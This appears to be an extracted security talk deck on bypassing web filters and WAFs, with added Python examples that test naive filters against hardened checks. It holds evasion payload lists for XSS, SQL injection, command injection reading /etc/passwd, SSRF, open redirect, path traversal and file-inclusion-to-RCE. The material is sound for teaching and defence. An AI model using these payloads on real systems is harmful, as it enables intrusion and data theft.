Serhii Korolenko - Passing Security By
http://sched.co/EF9c
1. Passing Security By
   (jjencode-obfuscated alert; the backslash escapes inside its string literals did not survive extraction)
   <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$, $___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+ $.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"(""+$.__$+$.__$ +$._$$+$._$+""+$.__$+$.$$_+$._$_+$._$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$_$+$._$$+$._$+""+$.$__+$.___+""+$.__$+$._$_+$._$$+$.$$$_+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.__$+"""+$.$__+$.___+")"+""")())();</script>
2. The Black List
3. The Black List / The White Box
4. Show Me Your /*Payl%0Ads*/
   Payload quality
   How your payloads
   Analytical skills
   Ciklum Hiring Lab
   Logs
5. Computer != Human (the obfuscated script and the plain one are the same program to the browser)
   <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_: ++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$, $_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($. $_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"") [$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+ $.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$; $.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$ $_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())();</script>
   <script>alert(0)</script>
6. White List / Black List / Web Application Firewall / Validation
   (the slide laid these properties out as a matrix under the four headings; translated from Ukrainian, in slide order)
   Hard to implement
   Hard to maintain
   Easy to implement
   Affects load
   Fun to bypass
   Vulnerability remains on the server
   BlackHat territory
   Not directly related to security
   Makes vulnerability discovery harder
   Baaa\x61\x61\x61d ("Baaaaaad" with three of the a's as hex escapes, the classic way past a word blacklist)
   Not bad remediation
   Does not apply to security
   Vulnerability still exists
7. Defense Reaction
   01. Encode: HTML-encode the input/output string.
   02. Delete: delete bad symbols and words.
   03. Erase: delete the whole string; the parameter is left empty.
   04. Logout: end the session for the malicious user.
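Reactions 01 and 02 side by side, as an added example that is not from the deck: a one-pass, case-sensitive delete of the bad word (reaction 02) is beaten by the nested-tag and mixed-case payloads the XSS slides list, while HTML-encoding the output (reaction 01) leaves nothing executable. The payloads are constructed for the example; `still_executes` is a crude stand-in for the browser that only looks for a surviving script tag.

```python
import html
import re

# Constructed payloads: the plain case, then the nested-tag and mixed-case
# tricks from the XSS slides (the closing tag is nested the same way).
PAYLOADS = [
    "<script>alert(1)</script>",
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "<ScRipT>alert(1)</ScRipT>",
]


def react_delete(s: str) -> str:
    """Reaction 02: remove the bad word. One pass, exact case, as naive filters do."""
    return s.replace("<script>", "").replace("</script>", "")


def react_encode(s: str) -> str:
    """Reaction 01: HTML-encode the string. Nothing is removed, nothing stays executable."""
    return html.escape(s, quote=True)


def still_executes(s: str) -> bool:
    """Crude browser stand-in: does a real <script tag survive the reaction?"""
    return re.search(r"<script\b", s, re.IGNORECASE) is not None


def evaluate(reaction) -> dict:
    """Map each payload to whether it still executes after the given reaction."""
    return {p: still_executes(reaction(p)) for p in PAYLOADS}


if __name__ == "__main__":
    for name, fn in (("delete", react_delete), ("encode", react_encode)):
        for payload, alive in evaluate(fn).items():
            print(f"{name:6} {'BYPASSED' if alive else 'blocked '} {payload}")
```

The delete reaction turns the nested payload back into a well-formed `<script>` tag, which is exactly why the deck lists deletion under "vulnerability still exists".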
8. Security Bypass Techniques
   Encoding, Technology Border, Logic, Little-Known, Replacing, Obfuscating
   Applied to: RCE, SQL Injection, XSS, SSRF, Directory Traversal + LFI, Open Redirect
9. XSS
   <script>alert()</script>
   <script>prompt()</script>
   <script>confirm()</script>
   <script>console.log()</script>
10. XSS, breaking out of the surrounding context
   <script>alert()</script>
   <tag "><script>alert()</script>
   ;alert()
   <a href="javascript:alert(1)">
11. XSS, tag-level variations
   <scr<script>ipt>
   <ScRipT>
   <svg onload="">
   <script >
   <script x>
12. XSS, whitespace substitutes
   NULL: <scri%00pt>alert ()</scri%00pt>
   TAB: <svg+src="jav%09ascript:alert(1)">
   Newline: <script>//>%0Aalert(1);</script>
   Carriage return: <script>//>%0Dalert(1);</script>
   Spaces: < s c r i p t > p r o m p t ( 1 ) < / s c r i p t
13. XSS, less-than sign
   < ‹ (homoglyph)
   %3c (URL encoding)
   %253c (double URL encoding)
   %C0%BC (overlong UTF-8: bytes 0xC0 0xBC decode to <)
   <img <
14. XSS, every spelling of the less-than sign
   %3C
   &lt &lt; &LT &LT;
   &#60 &#060 &#0060 &#00060 &#000060 &#0000060 (decimal, with or without ';', zero-padded)
   &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x000003c;
   &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X000003c;
   &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X000003C;
   &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x000003C;
   \x3c \x3C \u003c \u003C (JavaScript string escapes)
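Slides 13 and 14 list many spellings of one character; the practical consequence is that a check must see the string the way the consumer will decode it. This added example (not from the deck) normalizes the forms above in the order a lenient pipeline applies them: repeated URL decoding (so %253c becomes %3c becomes <), overlong UTF-8, HTML entities with or without the semicolon and with zero padding, then JavaScript `\xHH` / `\uHHHH` escapes. The sample list and the `lenient_utf8` decoder are constructed for the example; the decoder deliberately accepts what a strict one rejects.

```python
import html
import re
from urllib.parse import unquote_to_bytes

# Constructed sample of the forms on slides 13-14; every one spells '<'.
LT_FORMS = [
    "%3C", "%253c", "&lt", "&lt;", "&LT", "&LT;", "&#60", "&#0000060",
    "&#x3c", "&#X000003C;", r"\x3c", r"\u003C", "%C0%BC",
]

_JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def lenient_utf8(data: bytes) -> str:
    """Strict UTF-8 first; on failure accept 2-byte overlong sequences such as
    C0 BC (ASCII '<' encoded in more bytes than needed) and pass other bytes
    through as Latin-1, mimicking the permissive decoders that made %C0%BC work."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        pass
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonicalize(s: str, rounds: int = 3) -> str:
    """Peel the layers: URL-decode until stable (bounded), tolerate overlong UTF-8,
    resolve HTML character references, then JavaScript string escapes."""
    for _ in range(rounds):
        decoded = lenient_utf8(unquote_to_bytes(s))
        if decoded == s:
            break
        s = decoded
    s = html.unescape(s)
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def naive_has_lt(s: str) -> bool:
    """What a literal-character blacklist sees."""
    return "<" in s


def canonical_has_lt(s: str) -> bool:
    """What the check sees after normalizing the way the consumer will."""
    return "<" in canonicalize(s)


if __name__ == "__main__":
    for form in LT_FORMS:
        print(f"{form:12} naive={naive_has_lt(form)!s:5} canonical={canonical_has_lt(form)}")
```

None of the thirteen forms contains a literal `<`, so a character blacklist passes all of them; after canonicalization every one of them does. The order of the decoders matters as much as the set: a single URL decode misses `%253c`, and an entity decode before the URL decode misses `%26lt%3B`.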
15. XSS inside <script>
   <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
   <script>a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);</script>
   <img src="1" onerror="alert(1)" />
   Obfuscation with jjencode:
   <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$: ({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({} +"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$. $_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($. $=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+ (!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$. $_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")()) ();</script>
16. JSFuck (whole program written with the six characters [ ] ( ) ! +)
   [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+ []+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[] +!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+ (!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[] +!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+ []+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+ [])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+ (!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[]) [+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]] +(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+ (!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+ [])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
17. NoNameCon CTF XSS (AngularJS expression sandbox escape)
   {{a = {'y':''.constructor.prototype}; a['y'].charAt=[].join;$eval('a=alert(1)');}}
   document.cookie = document['cookie']
   {{a = {'y':''['constructor']['prototype']};a['y']["charAt"]=[]["join"];$eval('a=alert(1)')}}
18. NoNameCon CTF XSS, the same payload in equivalent forms (bracket access instead of dots, then split across several expressions)
   {{a = {'y':''.constructor.prototype}  =  {{a['y']=''['constructor']['prototype']
   {{a['y']=''['constructor']['prototype'];a['y']['charAt']=[]['join'];$eval('a=alert(1)')}}
   {{a['y']=''['constructor']['prototype']}}{{a['y']['charAt']=[]['join']}}{{$eval('a=alert(1)')}}
19. NoNameCon CTF XSS (screenshot only)
20. Best XSS
   ><svg/onload=alert(1)>
21. SQL Injection, characters with their single and double URL encodings
   '   %27    %2527
   "   %22    %2522
   #   %23    %2523
   --  %2d%2d %252d%252d
   ;   %3B    %253B
   )   %29    %2529
   *   %2a    %252a
   ;%00 (null byte)
   /* C-style comment
   -- - SQL comment
22. SQL Injection, logic testing
   ' or 1=1 (true)
   ' or 1=2 (false)
   ' and 1=1 (true)
   ' and 1=2 (false)
   ' OR 1<2 (TRUE)
   ' OR 'aaa'<>'bbb' (TRUE)
23. Blind SQL Injection, time-based
   '+waitfor+delay+'00:00:05'--   (MSSQL)
   '+AND+BENCHMARK(1000000000,MD5(1))   (MySQL)
   '+AND+SLEEP(5)   (MySQL)
24. SQL Injection, space substitutes
   %09 horizontal tab
   %0A new line
   %0D carriage return
   %0B vertical tab
   %0C form feed (new page)
   %A0 non-breaking space
   /**/ comment
   /*!*/ MySQL version comment
   '%0A%09UNION%0CSELECT%A0NULL%20%23
25. SQL Injection, space substitutes in MSSQL (any control character %01 to %1F is accepted as whitespace)
   %01 Start of Heading, %02 Start of Text, %03 End of Text, %04 End of Transmission, %05 Enquiry, %06 Acknowledge, %07 Bell, %08 Backspace, %09 Horizontal Tab, %0A New Line, %0B Vertical Tab, %0C New Page, %0D Carriage Return, %0E Shift Out, %0F Shift In, %10 Data Link Escape, %11 Device Control 1, %12 Device Control 2, %13 Device Control 3, %14 Device Control 4, %15 Negative Acknowledge, %16 Synchronous Idle, %17 End of Transmission Block, %18 Cancel, %19 End of Medium, %1A Substitute, %1B Escape, %1C File Separator, %1D Group Separator, %1E Record Separator, %1F Unit Separator, %20 Space, %25 %
   S%E%L%E%C%T%01column%02FROM%03table;   (some URL decoders drop a % that is not followed by two hex digits, so S%E%L%E%C%T reaches the database as SELECT)
26. SQL Injection, no spaces
   UNION(SELECT(column)FROM(table))
   1'UNION(SELECT(1),2,3,4,5,(6)FROM(Users)WHERE(login='admin'))#
   Allowed intermediary characters after AND/OR: %20 space, %2B +, %2D -, %7E ~, %21 !, %40 @
   OR-+-+-+-+~~1=1
27. SQL Injection, keyword filters
   SeLeCt
   %00SELECT
   SELSELECTECT (survives a filter that removes SELECT once)
   %53%45%4c%45%43%54
   %2553%2545%254c%2545%2543%2554
   UNION ALL SELECT -> /*!union*/+/*!all*/+/*!select*/
   AND -> && -> '&&1=2
   OR -> || -> '||1=1
   = -> LIKE, REGEXP, NOT < AND NOT >
   > X -> NOT BETWEEN 0 AND X
   WHERE -> HAVING
28. SQL Injection, avoiding quotes and commas
   WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)   ('admin' via MSSQL string concatenation)
   SELECT password FROM User WHERE login=0x61646D696E   ('admin' as a MySQL hex literal)
   No comma: SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1) JOIN (SELECT 2) JOIN (SELECT 3) JOIN (SELECT 4)
   LIMIT 0,1 -> LIMIT 1 OFFSET 0
   SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1)
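The keyword and whitespace tricks of slides 24, 26 and 27 only matter because the filtered string is still handed to the database as SQL. This added example (not from the deck) runs them against an in-memory SQLite table: a blacklist that rejects spaces and strips UNION and SELECT once each is passed by `/**/` as whitespace and by doubled keywords, and the `OR-+-+~~1=1` form needs no space at all, while the same payloads are inert against a bound parameter. The table, the payloads and the filter are constructed for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed sample table (not from the talk)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (login TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret"), ("alice", "hunter2")])
    return con


def keyword_blacklist(s):
    """The kind of filter slides 24 and 27 target: reject a plain space and strip
    UNION and SELECT once each, case-insensitively. None means rejected."""
    if " " in s:
        return None
    for kw in ("union", "select"):
        s = re.sub(kw, "", s, count=1, flags=re.IGNORECASE)
    return s


def lookup_vulnerable(con, login):
    """String concatenation behind the blacklist: the filtered value is still SQL."""
    filtered = keyword_blacklist(login)
    if filtered is None:
        return None
    row = con.execute(
        f"SELECT password FROM users WHERE login='{filtered}'").fetchone()
    return row[0] if row else None


def lookup_hardened(con, login):
    """Bound parameter: whatever the string contains, it is compared, never parsed."""
    row = con.execute(
        "SELECT password FROM users WHERE login=?", (login,)).fetchone()
    return row[0] if row else None


# Constructed payloads: comments instead of spaces (slide 24), doubled keywords
# that survive one strip pass (slide 27), and OR followed only by + - ~ (slide 26).
PAYLOAD_UNION = ("x'/**/UNUNIONION/**/SELSELECTECT/**/password/**/FROM/**/users"
                 "/**/WHERE/**/login='admin")
PAYLOAD_OR = "x'OR-+-+~~1=1--"

if __name__ == "__main__":
    con = make_db()
    for p in (PAYLOAD_UNION, PAYLOAD_OR):
        print("vulnerable:", lookup_vulnerable(con, p), " hardened:", lookup_hardened(con, p))
```

After one strip pass `UNUNIONION` reads `UNION` and `SELSELECTECT` reads `SELECT`, so the filter reconstructs the very keywords it removed; `-+-+~~1` evaluates to 1 in SQLite, so `OR-+-+~~1=1` is a true clause with no space between the operator and its operand.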
29. Remote Command Execution
   Additional command: ; ls   && ls   | ls   || ls
   Inside a command: $(cat /etc/passwd)   `cat /etc/passwd`
   () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"   (Shellshock)
   Blind: sleep(5)   ping -i 30 127.0.0.1
30. Remote Command Execution without spaces (Linux)
   cat</etc/passwd
   {cat,/etc/passwd}   (bash brace expansion)
   cat$IFS/etc/passwd   (IFS, the internal field separator, expands to whitespace)
   cat${IFS}/etc/passwd
   IFS=,;`cat<<<uname,-a`
   who$@ami
   w'h'o'am'i
   w"h"o"am"i
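The no-space tricks on slide 30 work because the string reaches a shell, and stop working when it does not. This added example (not from the deck) shows both sides: a filter that rejects whitespace and the usual separators, a vulnerable function that concatenates the value into a `shell=True` command, and a hardened one that passes it as a single argv element. The two files and the `${IFS}` payload are constructed for the example; it assumes a POSIX `/bin/sh` and a `cat` binary.

```python
import os
import re
import subprocess
import tempfile


def space_blacklist(arg: str) -> bool:
    """The naive filter: refuse whitespace and the 'additional command' separators.
    '$' is not on the list, which is all the ${IFS} trick needs."""
    return re.search(r"[\s;|&]", arg) is not None


def make_files():
    """Constructed fixture: a file the feature may show, and one it must not."""
    d = tempfile.mkdtemp()
    public = os.path.join(d, "public.txt")
    secret = os.path.join(d, "secret.txt")
    with open(public, "w") as f:
        f.write("public")
    with open(secret, "w") as f:
        f.write("SECRET")
    return public, secret


def show_vulnerable(path: str) -> str:
    """Filtered, then handed to /bin/sh as one string: the shell re-parses it."""
    if space_blacklist(path):
        return "rejected"
    return subprocess.run("cat " + path, shell=True,
                          capture_output=True, text=True).stdout


def show_hardened(path: str) -> str:
    """No shell: the string is one argv element, so ${IFS} is just seven characters."""
    r = subprocess.run(["cat", path], capture_output=True, text=True)
    return r.stdout if r.returncode == 0 else "error"


def ifs_payload(public: str, secret: str) -> str:
    """Slide 30: ${IFS} expands to the shell's field separators, i.e. a space,
    and the expansion is then word-split into two arguments."""
    return f"{public}${{IFS}}{secret}"


if __name__ == "__main__":
    pub, sec = make_files()
    p = ifs_payload(pub, sec)
    print("filter rejects:", space_blacklist(p))
    print("shell=True   ->", repr(show_vulnerable(p)))
    print("argv list    ->", repr(show_hardened(p)))
```

The payload contains no whitespace, so the filter passes it; under `shell=True` the shell expands `${IFS}` and `cat` receives two file names, under the argv form `cat` receives one name that does not exist.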
31. Server-Side Request Forgery, alternative spellings of local addresses
   http://127.0.0.1
   http://localhost
   http://0177.0.0.1   (octal)
   http://2130706433 = http://127.0.0.1   (decimal)
   http://3232235521 = http://192.168.0.1
   http://0xA9.0xFE.0xA9.0xFE/   (hex; 169.254.169.254)
   http://[::]:80/
   http://0000::1:80/
   http://localtest.me   (a public DNS name that resolves to 127.0.0.1)
32. Server-Side Request Forgery (screenshot only)
33. Server-Side Request Forgery, parser confusion and homoglyphs
   http://1.1.1.1&@2.2.2.2#@3.3.3.3/   (different URL parsers pick different hosts out of this)
   http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com   (enclosed alphanumerics are normalised to plain letters)
   ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾
34. Open URL Redirection
   //www.yoursite.com
   https:www.yoursite.com
   /\www.yoursite.com/
   //www.yoursite.com/
   //www%E3%80%82yoursite%E3%80%82com   (%E3%80%82 is the ideographic full stop)
   //www.yoursite%00.com
   www.whitelisted.com.www.yoursite.com redirect to evil.com
   http://www.theirsite.com@www.yoursite.com/
   http://www.yoursite.com/http://www.theirsite.com/
   http://www.yoursite.com/folder/www.folder.com
   http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
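Slides 31, 33 and 34 all exploit the gap between the string a filter compares and the host a resolver or browser actually uses. This added example (not from the deck) closes that gap in two checks: an SSRF check that parses IPv4 literals the way `inet_aton` does (octal, hex and plain-integer forms included), IDNA-normalizes the hostname, refuses userinfo, and then classifies the address; and a redirect check that accepts only a same-origin path and rejects `//`, `/\`, `scheme:` and `@` forms. The allowlist and blocklist are constructed for the example. It does not resolve DNS, so a name such as localtest.me is refused only because it is not on the allowlist; a real implementation must resolve the name and re-apply the address check to every resolved address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist for a hypothetical fetch/redirect feature.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
# What a naive string blocklist compares the hostname against.
NAIVE_BLOCKED = {"127.0.0.1", "localhost", "169.254.169.254", "192.168.0.1"}


def naive_ssrf_check(url: str) -> str:
    """Hostname string against a blocklist: every spelling on slide 31 slips past."""
    host = urlsplit(url).hostname or ""
    return "blocked" if host in NAIVE_BLOCKED else "ok"


def ip_literal(host: str):
    """Parse an IPv4 literal the way inet_aton does (0177.0.0.1, 0xA9.0xFE.0xA9.0xFE
    and 2130706433 are all accepted), else an IPv6 literal, else None."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def canonical_host(url: str):
    """The host a resolver would use, or None for a non-http scheme, a missing
    authority, userinfo (the '@' tricks on slides 33-34) or a bad IDNA label."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if "@" in parts.netloc:
        return None
    host = (parts.hostname or "").rstrip(".")
    try:
        return host.encode("idna").decode("ascii")  # ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ -> example.com
    except UnicodeError:
        return None


def is_internal(ip) -> bool:
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified


def ssrf_check(url: str) -> str:
    """Canonicalize first, then decide; returns 'ok' or 'blocked: <reason>'."""
    host = canonical_host(url)
    if host is None:
        return "blocked: url"
    ip = ip_literal(host)
    if ip is not None:
        return "blocked: internal address" if is_internal(ip) else "blocked: ip literal"
    return "ok" if host in ALLOWED_HOSTS else "blocked: host not allowed"


def redirect_check(target: str) -> str:
    """Slide 34: only a same-origin relative path may be followed. Anything with a
    scheme or authority, or that browsers read as one ('//', '/\\'), is refused."""
    parts = urlsplit(target)
    if parts.scheme or parts.netloc or "\x00" in target:
        return "blocked"
    if not parts.path.startswith("/") or parts.path[1:2] in ("/", "\\"):
        return "blocked"
    return "ok"


if __name__ == "__main__":
    for u in ("http://2130706433/", "http://0177.0.0.1/", "http://0xA9.0xFE.0xA9.0xFE/",
              "http://1.1.1.1&@2.2.2.2#@3.3.3.3/", "http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ/"):
        print(f"{u:40} naive={naive_ssrf_check(u):8} canonical={ssrf_check(u)}")
    for t in ("/account", "//www.yoursite.com", "https:www.yoursite.com", "/\\www.yoursite.com/"):
        print(f"{t:30} redirect={redirect_check(t)}")
```

The circled-letter host is the instructive case: the naive check sees an unfamiliar string, the canonical check sees example.com, and only the latter agrees with what the resolver will do.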
35. Directory Traversal + File Inclusion
   /etc/passwd
   ../../../../../../../../../../../../../../../etc/passwd
   ../.././././.././.././../../etc/passwd
   ../../../etc/passwd%00
   ....//....//etc/passwd   (survives a filter that strips ../ once)
   ..///////..////..//////etc/passwd
   .. ../ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216
   16-bit Unicode (%uXXXX) encoding: . = %u002e   / = %u2215   \ = %u2216
   Double URL encoding: . = %252e   / = %252f   \ = %255c
   Overlong UTF-8 encoding: . = %c0%2e, %e0%40%ae, %c0ae   / = %c0%af, %e0%80%af, %c0%2f   \ = %c0%5c, %c0%80%5c
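The traversal forms above target two mistakes: decoding once and stripping `../` once. This added example (not from the deck) shows the vulnerable resolver and a hardened one that decodes until the value stops changing, rejects NUL bytes, normalizes the path lexically and then requires the result to stay under the document root. The document root is a hypothetical constant and the check is POSIX-only; it does not attempt the overlong UTF-8 forms, which `urllib` decodes to U+FFFD rather than to `.` and `/`.

```python
import os
from urllib.parse import unquote

BASE = "/var/www/files"  # hypothetical document root (assumption)


def strip_dotdot_once(p: str) -> str:
    """The single-pass filter that '....//' is built to survive: remove every '../' once."""
    return p.replace("../", "")


def resolve_vulnerable(user_path: str) -> str:
    """One URL decode, one strip pass, string concatenation."""
    return BASE + "/" + strip_dotdot_once(unquote(user_path))


def resolve_hardened(user_path: str):
    """Decode until stable (defeats %252e), reject NUL, normalize, and keep the
    result inside BASE. Returns the absolute path or None."""
    p = user_path
    for _ in range(4):
        d = unquote(p)
        if d == p:
            break
        p = d
    if "\x00" in p:
        return None
    full = os.path.normpath(os.path.join(BASE, p.lstrip("/")))
    if os.path.commonpath([BASE, full]) != BASE:
        return None
    return full


if __name__ == "__main__":
    for p in ("docs/report.pdf", "....//....//....//etc/passwd",
              "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
              "..///////..////..//////etc/passwd", "../../../etc/passwd%00.png"):
        print(f"{p:55} vulnerable={os.path.normpath(resolve_vulnerable(p))}  hardened={resolve_hardened(p)}")
```

Two of the slide's forms behave differently under the hardened resolver: `....//` is no longer dangerous because nothing strips `../` any more, so `....` is just a directory name that does not exist; `%252e%252e%252f` becomes `../` after the second decode and is caught by the containment check. `normpath` is lexical, so a deployment that serves real files should also apply `realpath` after the file is located, to catch symlinks pointing outside the root.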
36. From File Inclusion to RCE
   file upload forms/functions
   PHP wrapper expect://command
   PHP wrapper php://file
   PHP wrapper php://filter
   PHP stream php://input
   data://text/plain;base64,command
   log files with controllable input: /var/log/apache/access.log, /var/log/apache/error.log, /var/log/vsftpd.log, /var/log/sshd.log, /var/log/mail
Uploaded by DmytroVelychko5, Apr. 24, 2020